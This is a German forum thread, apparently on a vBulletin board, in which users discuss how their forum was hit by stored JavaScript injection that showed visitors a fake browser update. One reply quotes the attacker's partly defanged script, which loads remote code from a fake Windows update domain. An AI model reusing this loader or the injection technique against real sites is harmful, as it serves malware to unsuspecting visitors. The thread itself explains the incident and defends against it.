Ergebnis 1 bis 15 von 42

Thema: Forum infiziert!

Hybrid-Darstellung

Vorheriger Beitrag Vorheriger Beitrag   Nächster Beitrag Nächster Beitrag
  1. #1
    Registriert seit
    05.07.2008
    Beiträge
    147
    Bei Äpfeln und Pinguinen kommt halt nicht alles durchs "Fenster" geflogen ;)

  2. #2
    Registriert seit
    08.06.2007
    Beiträge
    709
    kann mir jmd als zufriedener windows nutzer erklären wie diese art angriff überhaupt funktioniert und keine sicherheitsmaßnahmen greifen?

  3. #3
    Registriert seit
    01.08.2007
    Beiträge
    557
    Schwachstelle in der Forensoftware suchen, finden &nutzen-->javascript code einfüge-->Voila der Browser meldet Update

  4. #4
    Registriert seit
    08.06.2007
    Beiträge
    709
    ah und wie wird der eingefügt?


    was in den beitrag geschrieben oder während der beitrag an den server gesendet wird?

  5. #5
    Registriert seit
    01.08.2007
    Beiträge
    557
    ich gehe davon aus, dass der schadcode, in das posting eingefügt wird.

  6. #6
    Registriert seit
    23.04.2003
    Beiträge
    807
    Zitat Zitat von Firefighter Heiti Beitrag anzeigen
    ich gehe davon aus, dass der schadcode, in das posting eingefügt wird.
    Richtig. Ein Fehler(oder eine Fehlkonfiguration) in der Forensoftware sorgt dafür, dass man in den Postings ein
    Code:
    {script}
    Hier Schadcode nach wahl
    {/script}
    benutzen kann. Eine genauere Beschreibung des Exploit(inklusive "Mustecode") steht hier

    EDIT: Natürlich nehmen wir Spitze klammern für die Tags, aber selbst im "Code" Fenster werden die Scripte ausgeführt. Zumindest würde ich von Code erwarten, dass der Inhalt in jedem Fall plain durchgeht

  7. #7
    Registriert seit
    08.06.2007
    Beiträge
    709
    achso...

    ich dachte auch das die software sowas filtert....


    naja...so schnell kanns gehen...kann man das aber nicht generell deaktivieren? das wird doch nicht wirklich gebraucht?

  8. #8
    Registriert seit
    01.08.2002
    Beiträge
    594
    Dem Kerl scheint echt langweilig zu sein.... der registriert sich den ganzen Tag in sämtlichen v-Bulletin-Foren, klinkt sich in irgendwelche Beiträge ein und steckt jedes mal das gleiche Script rein... welches dann so aussieht:


    XXXXXript language='JavaScript' type='text/javascript'>document.write("<" + "script language='JavaScript' type='text/javascript' src='http://windows-updateserver.com/signature/hKLYZ5joxmvAlyz147fYlWXU4mn5R3Pg?rand=" + Math.random() * 100000000 +"'>")


    (die XXX sind nur Platzhalter - damit das Ding etwas entschärft ist)

    Würde mich interessieren, was er damit bezwecken will.... Vielleicht kommt er ja noch wieder und klärt uns auf.

Aktive Benutzer

Aktive Benutzer

Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •